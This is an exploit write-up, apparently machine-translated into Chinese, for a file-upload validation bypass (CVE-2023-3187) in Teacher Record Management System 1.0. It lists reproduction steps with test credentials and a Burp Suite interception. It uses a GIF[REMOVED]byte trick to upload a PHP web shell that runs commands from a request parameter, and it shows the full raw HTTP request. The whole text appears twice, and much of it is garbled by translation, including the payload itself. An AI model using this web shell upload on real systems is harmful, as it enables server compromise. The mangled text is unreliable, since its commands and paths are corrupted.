利用标题:教师记录管理系统1.0 - 文件上传类型验证
日期: 17-01-2023
exploit-author: affan ahmed
供应商HomePage: https://phpgurukul.com
软件link: https://phpgurukul.com/teachers-record-management-system-system-system-php-and-mysql/
版本: 1.0
在: Windows 11 + XAMPP上测试
CVE : CVE-2023-3187
========================================
步骤_to_reproduce
========================================
1。登录教师会议,并具有“用户名: [email protected]”
密码:测试@123英寸
2。导航到个人资料部分,并单击编辑图像编辑配置文件图片
3。打开润裤并拦截编辑图像请求
4。在邮政请求中,将“文件名”从“ profile pictura.png”更改为“ profile picturaptic.php.gif”
5。将**内容类型从“ Image/png”更改为“ Image/gif”
6。添加此有效载荷 :`gif89a?php echo系统($ _请求['dx']);'
7。** gif89a是gif魔术bytes此绕过文件上传扩展名**
8。下
====================================================
burpsuite_request
====================================================
post/trms/teacher/changeimage.php http/1.1
HOST: LOCALHOST
内容长度: 442
cache-control: max-age=0
sec-ch-ua:'铬'; v='109','not_a brand'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryndapya0ggoxsuhdf
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/109.0.5414.75 Safari/537.36
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.9
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/trms/thoct/thercemage.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=8ALF0RBFJMHM3DDRA7SI0CV7QC
连接:关闭
------ webkitformboundaryndapya0ggoxsuhdf
content-disposition: form-data;名称='主题'
约翰马云惹不起马云多伊
------ webkitformboundaryndapya0ggoxsuhdf
content-disposition: form-data; name='newpic'; filename='profile pictura.php.gif'
content-type:图像/gif
gif89a?php echo系统($ _请求['dx']);
------ webkitformboundaryndapya0ggoxsuhdf
content-disposition: form-data;名称='提交'
------ webkitformboundaryndapya0ggoxsuhdf--
========================================
procip_of_concept
========================================
github_link: https://github.com/ctflearner/vulnerability/blob/main/teacher_record_management_system/trms.md
日期: 17-01-2023
exploit-author: affan ahmed
供应商HomePage: https://phpgurukul.com
软件link: https://phpgurukul.com/teachers-record-management-system-system-system-php-and-mysql/
版本: 1.0
在: Windows 11 + XAMPP上测试
CVE : CVE-2023-3187
========================================
步骤_to_reproduce
========================================
1。登录教师会议,并具有“用户名: [email protected]”
密码:测试@123英寸
2。导航到个人资料部分,并单击编辑图像编辑配置文件图片
3。打开润裤并拦截编辑图像请求
4。在邮政请求中,将“文件名”从“ profile pictura.png”更改为“ profile picturaptic.php.gif”
5。将**内容类型从“ Image/png”更改为“ Image/gif”
6。添加此有效载荷 :`gif89a?php echo系统($ _请求['dx']);'
7。** gif89a是gif魔术bytes此绕过文件上传扩展名**
8。下
====================================================
burpsuite_request
====================================================
post/trms/teacher/changeimage.php http/1.1
HOST: LOCALHOST
内容长度: 442
cache-control: max-age=0
sec-ch-ua:'铬'; v='109','not_a brand'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- webkitformboundaryndapya0ggoxsuhdf
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/109.0.5414.75 Safari/537.36
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.9
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/trms/thoct/thercemage.php
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=8ALF0RBFJMHM3DDRA7SI0CV7QC
连接:关闭
------ webkitformboundaryndapya0ggoxsuhdf
content-disposition: form-data;名称='主题'
约翰马云惹不起马云多伊
------ webkitformboundaryndapya0ggoxsuhdf
content-disposition: form-data; name='newpic'; filename='profile pictura.php.gif'
content-type:图像/gif
gif89a?php echo系统($ _请求['dx']);
------ webkitformboundaryndapya0ggoxsuhdf
content-disposition: form-data;名称='提交'
------ webkitformboundaryndapya0ggoxsuhdf--
========================================
procip_of_concept
========================================
github_link: https://github.com/ctflearner/vulnerability/blob/main/teacher_record_management_system/trms.md